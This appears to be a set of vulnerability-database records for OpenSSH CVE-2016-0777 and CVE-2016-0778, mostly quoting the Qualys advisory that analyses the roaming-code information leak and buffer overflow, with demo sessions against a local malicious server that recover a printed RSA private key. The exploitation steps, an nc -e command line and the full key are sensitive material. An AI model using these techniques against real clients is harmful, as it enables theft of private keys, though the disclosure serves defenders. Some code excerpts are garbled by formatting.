"product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.8, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2019-16905" } ] }
ghsa-cqpr-rfm2-cchc
Vulnerability from github
The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings.
{ "affected": [], "aliases": [ "CVE-2016-0778" ], "database_specific": { "cwe_ids": [ "CWE-119" ], "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2016-01-14T22:59:00Z", "severity": "HIGH" }, "details": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings.", "id": "GHSA-cqpr-rfm2-cchc", "modified": "2022-05-13T01:29:18Z", "published": "2022-05-13T01:29:18Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0778" }, { "type": "WEB", "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released" }, { "type": "WEB", "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released" }, { "type": "WEB", "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05247375" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05356388" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05385680" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201601-01" }, { "type": "WEB", "url": "https://support.apple.com/HT206167" }, { "type": "WEB", "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10734" }, { "type": "WEB", "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/176516.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176349.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/135273/Qualys-Security-Advisory-OpenSSH-Overflow-Leak.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2016/Jan/44" }, { "type": "WEB", "url": "http://www.debian.org/security/2016/dsa-3446" }, { "type": "WEB", "url": "http://www.openssh.com/txt/release-7.1p2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/80698" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1034671" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2869-1" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ] }
var-201601-0030
Vulnerability from variot
The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme
Private Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key
$ head -n 1 /etc/motd FreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013
$ /usr/bin/ssh -V OpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013
